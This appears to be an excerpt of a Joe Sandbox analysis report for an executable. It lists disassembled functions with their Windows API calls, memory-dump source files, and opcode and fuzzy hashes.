                                                                  • API String ID: 3500052701-0
                                                                  • Opcode ID: c7175b80a36800a5238581b314fa76541972fd7300cf3bef7684249528207aeb
                                                                  • Instruction ID: 6c3567b74c0ff3900a8309e48c39533df8d328c81b5da9e0ffdaaaa4f1792a74
                                                                  • Opcode Fuzzy Hash: c7175b80a36800a5238581b314fa76541972fd7300cf3bef7684249528207aeb
                                                                  • Instruction Fuzzy Hash: 4F31D4B1900354AFEB32CF248895BE6BBEEAF02308F1044AEE5DD57242D7741A85CB51
                                                                  Function 0065970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,006597BA,FF8BC369,00000000,00000002,00000000), ref: 00659744
                                                                  • GetLastError.KERNEL32(?,006597BA,FF8BC369,00000000,00000002,00000000,?,00655ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00646F41), ref: 0065974E
                                                                  • __dosmaperr.LIBCMT ref: 00659755
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastPointer__dosmaperr
                                                                  • String ID:
                                                                  • API String ID: 2336955059-0
                                                                  • Opcode ID: 02d3abb08245d20526091b7718db20838030d82b4a4748c856e5bfbc9d43ad37
                                                                  • Instruction ID: 6776091a49230b2bbcf8106123b734cf001f909b3a8057d144cc8f5d33fe9546
                                                                  • Opcode Fuzzy Hash: 02d3abb08245d20526091b7718db20838030d82b4a4748c856e5bfbc9d43ad37
                                                                  • Instruction Fuzzy Hash: 9801D832620514EBCB159FA9DC058AE7B6BDB89331F25025AFC119B290EB719D419BA0
                                                                  Function 00631990 Relevance: 3.6, APIs: 2, Instructions: 643COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c687b8f4019b33aac1ad34ac3f2c1ef35822b05a5048dbb19031f698e831fed0
                                                                  • Instruction ID: 4d98aa1881ebcb90ba04ef449d4125ae01cf6a8afe2ec802a183c6003833d52a
                                                                  • Opcode Fuzzy Hash: c687b8f4019b33aac1ad34ac3f2c1ef35822b05a5048dbb19031f698e831fed0
                                                                  • Instruction Fuzzy Hash: 0332CD30A00A15DFDB24DF54C881AEEB7B7EF06314F148559F91AAB3A1EB31AD40CB95
                                                                  Function 0062396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00623A3C
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell_
                                                                  • String ID:
                                                                  • API String ID: 1144537725-0
                                                                  • Opcode ID: e420c171872c3cf65cf9725fb6d0e3d3930509cfb0f3bc2afb67b29c36706c35
                                                                  • Instruction ID: 50e330eb37cbdfe71093387cd9def407ec5a94a692fdd652721e6498cf36811f
                                                                  • Opcode Fuzzy Hash: e420c171872c3cf65cf9725fb6d0e3d3930509cfb0f3bc2afb67b29c36706c35
                                                                  • Instruction Fuzzy Hash: 463180B1504B219FD320DF24E8947A7BBE9FB49708F00092EE5D987341E775A948CF52
                                                                  Function 0062331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsThemeActive.UXTHEME ref: 0062333D
                                                                    • Part of subcall function 006232E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 006232FB
                                                                    • Part of subcall function 006232E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00623312
                                                                    • Part of subcall function 0062338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00623368,?), ref: 006233BB
                                                                    • Part of subcall function 0062338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00623368,?), ref: 006233CE
                                                                    • Part of subcall function 0062338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,006F2418,006F2400,?,?,?,?,?,?,00623368,?), ref: 0062343A
                                                                    • Part of subcall function 0062338B: SetCurrentDirectoryW.KERNEL32(?,00000001,006F2418,?,?,?,?,?,?,?,00623368,?), ref: 006234BB
                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00623377
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                  • String ID:
                                                                  • API String ID: 1550534281-0
                                                                  • Opcode ID: 0da375b4facada9ad636e8e81abbca32841740535dca95546a850cb3d4315b9d
                                                                  • Instruction ID: 298fa166255a34e65bf7fbd7bdd002969414f1423c2bcff6e3b809ed67154d1f
                                                                  • Opcode Fuzzy Hash: 0da375b4facada9ad636e8e81abbca32841740535dca95546a850cb3d4315b9d
                                                                  • Instruction Fuzzy Hash: 48F0B4B35147969FD300AF74FC1BB743793A700749F001819B505892E2DBB98251CF04
                                                                  Function 0063FFE0 Relevance: 2.6, APIs: 2, Instructions: 94sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleSleep
                                                                  • String ID:
                                                                  • API String ID: 252777609-0
                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                  • Instruction ID: f0a47c2a33779cc54e3ffdf088738d89308fd9b6213c77b015fde11e56add580
                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                  • Instruction Fuzzy Hash: 4131D271A00115DFE718DF58D480AA9FBB6FB99700B2486A9E509CB352D732EDC1CBC0
                                                                  Function 0062CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 0062CEEE
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID:
                                                                  • API String ID: 1385522511-0
                                                                  • Opcode ID: 1385b5f431335b5467c49ac748a5d5d13223566c0d53e5cf733a1dcb29b76504
                                                                  • Instruction ID: 47809c1969fd7ea552ba946c06a7c523b6b7fc30d69fc5f3e2373c5138fedab6
                                                                  • Opcode Fuzzy Hash: 1385b5f431335b5467c49ac748a5d5d13223566c0d53e5cf733a1dcb29b76504
                                                                  • Instruction Fuzzy Hash: CA32BF75A006299FDB24CF58D884ABEBBB7EF45360F15805AE909AF351C734AD41CF90
                                                                  Function 006A7AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: LoadString
                                                                  • String ID:
                                                                  • API String ID: 2948472770-0
                                                                  • Opcode ID: 32b0662ae96b52a32276bf0f9456e781a10355294ac20dea89542ebfb31aa6d9
                                                                  • Instruction ID: 97fe50135a761188671a966174d8e533906e5764875584d836e9d1a53c3c1215
                                                                  • Opcode Fuzzy Hash: 32b0662ae96b52a32276bf0f9456e781a10355294ac20dea89542ebfb31aa6d9
                                                                  • Instruction Fuzzy Hash: FDD15C74A0420ADFCB14EF98D8819EDBBB6FF59310F144159E915AB391DB30AE42CF94
                                                                  Function 0064F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9b3ad1325e968694f5eefb16356360e8678bcba65e93f824daac0af92b928eb6
                                                                  • Instruction ID: 5f31c263b9ce6ae5b3ca966bb04731ada2cc4a5b865cf5c9debabbd6e08c188a
                                                                  • Opcode Fuzzy Hash: 9b3ad1325e968694f5eefb16356360e8678bcba65e93f824daac0af92b928eb6
                                                                  • Instruction Fuzzy Hash: 6F51B875A00104EFDB10DFA8C855EAA7BE7EF85364F198168E8189B391D771EE42CB50
                                                                  Function 0068FCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharLowerBuffW.USER32(?,?), ref: 0068FCCE
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharLower
                                                                  • String ID:
                                                                  • API String ID: 2358735015-0
                                                                  • Opcode ID: d948ebe49d75273ba79117423293480d985b191d21c4f97931f4304290ee2ee9
                                                                  • Instruction ID: 392ef1a0a608f8512464fd3aee9761f8bb7eafd0988b2455c8b14d2bfb620376
                                                                  • Opcode Fuzzy Hash: d948ebe49d75273ba79117423293480d985b191d21c4f97931f4304290ee2ee9
                                                                  • Instruction Fuzzy Hash: F941D6B2500209AFDB51EFA8C8819EEB7BAEF44314B20463EF616D7251EB70DE05CB50
                                                                  Function 00626679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0062668B,?,?,006262FA,?,00000001,?,?,00000000), ref: 0062664A
                                                                    • Part of subcall function 0062663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0062665C
                                                                    • Part of subcall function 0062663E: FreeLibrary.KERNEL32(00000000,?,?,0062668B,?,?,006262FA,?,00000001,?,?,00000000), ref: 0062666E
                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,006262FA,?,00000001,?,?,00000000), ref: 006266AB
                                                                    • Part of subcall function 00626607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00665657,?,?,006262FA,?,00000001,?,?,00000000), ref: 00626610
                                                                    • Part of subcall function 00626607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00626622
                                                                    • Part of subcall function 00626607: FreeLibrary.KERNEL32(00000000,?,?,00665657,?,?,006262FA,?,00000001,?,?,00000000), ref: 00626635
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Load$AddressFreeProc
                                                                  • String ID:
                                                                  • API String ID: 2632591731-0
                                                                  • Opcode ID: 1700b728f2e810cb46e01066aac6b8abda6c1203c78ab73a12cda47f87e8eca1
                                                                  • Instruction ID: cef20644f99e4a5c6fb107c83e17eaf19a3ab56ae8b14bb4d391253e120e1185
                                                                  • Opcode Fuzzy Hash: 1700b728f2e810cb46e01066aac6b8abda6c1203c78ab73a12cda47f87e8eca1
                                                                  • Instruction Fuzzy Hash: 36112772600615AACF54AB20EC02FAD7BA7AF40700F10842DF542AA1C2EF75DA05DF69
                                                                  Function 00658782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: __wsopen_s
                                                                  • String ID:
                                                                  • API String ID: 3347428461-0
                                                                  • Opcode ID: 6092b62987b5d8484cf191d68298a622defd6d453ea85a893a351e15b7511341
                                                                  • Instruction ID: 63538995500c5b66e6139e0f9f38ed3620f13d9608b796ab6d6de45e7de474ca
                                                                  • Opcode Fuzzy Hash: 6092b62987b5d8484cf191d68298a622defd6d453ea85a893a351e15b7511341
                                                                  • Instruction Fuzzy Hash: 0C11187590410AEFCB05DF58E9459DE7BF5EF48310F114069FC09AB311DA31EA15CBA5
                                                                  Function 00655373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00654FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0065319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00655031
                                                                  • _free.LIBCMT ref: 006553DF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap_free
                                                                  • String ID:
                                                                  • API String ID: 614378929-0
                                                                  • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                  • Instruction ID: 974e537aef5857fbb36c18d096b2d52cc4fb212f75ddc86e4bb82ec723ba57c1
                                                                  • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                  • Instruction Fuzzy Hash: 19014E721003056BE3318F59D84595AFBEEFB853B1F25052DE98583280FB706809C774
                                                                  Function 0064E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                  • Instruction ID: e970a5c2ba4d4c27fc9d8fc6100f5b7b52c2a96daff2ba33b34162879ce5143e
                                                                  • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                  • Instruction Fuzzy Hash: FDF02D325016105AD7F13A2ADC05B9A339BAF42335F10071DFC21932D1EB71D80686DA
                                                                  Function 0062B329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen
                                                                  • String ID:
                                                                  • API String ID: 176396367-0
                                                                  • Opcode ID: faa0466afaf17761815a6b850a0c79bb991deb5b4a71d50c1dda8d7f1d7fb8b2
                                                                  • Instruction ID: c7eec60b95548971111d11b1901145e0871daf318707b605f8f0a632df399775
                                                                  • Opcode Fuzzy Hash: faa0466afaf17761815a6b850a0c79bb991deb5b4a71d50c1dda8d7f1d7fb8b2
                                                                  • Instruction Fuzzy Hash: FDF0A4B26016146ED7549F28D806FA6BB99EB44360F10812EFA19CB2D1DB31E5108AA4
                                                                  Function 0069F94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0069F987
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentVariable
                                                                  • String ID:
                                                                  • API String ID: 1431749950-0
                                                                  • Opcode ID: d8326e7576ad4e08f9d7014645bac2fb89bd406a314fda9501d2d49941ac47eb
                                                                  • Instruction ID: 0bb51f3ac0f8c51afdaa7dae634f01ba1e616765ecabe0d335077c3605ad7330
                                                                  • Opcode Fuzzy Hash: d8326e7576ad4e08f9d7014645bac2fb89bd406a314fda9501d2d49941ac47eb
                                                                  • Instruction Fuzzy Hash: 06F08172600114BFDB40EBA5DC46D9E7BBEEF49710F000058F6059B261DA70AA40CB54
                                                                  Function 00654FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0065319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00655031
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: d726ab8a4a917254fe23e37e7cda1dbc1c53e05a1f73821dce61b28b3cb8970c
                                                                  • Instruction ID: 13a1569917ccb051d4cdc72520991af66e852a93160c31209704ca2a914845b5
                                                                  • Opcode Fuzzy Hash: d726ab8a4a917254fe23e37e7cda1dbc1c53e05a1f73821dce61b28b3cb8970c
                                                                  • Instruction Fuzzy Hash: A3F0E932510E20A7DB315F26DC29F9B374BAF407E1F154022BC069B2D0EA70D80A86E0
                                                                  Function 00653B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,00646A79,?,0000015D,?,?,?,?,006485B0,000000FF,00000000,?,?), ref: 00653BC5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
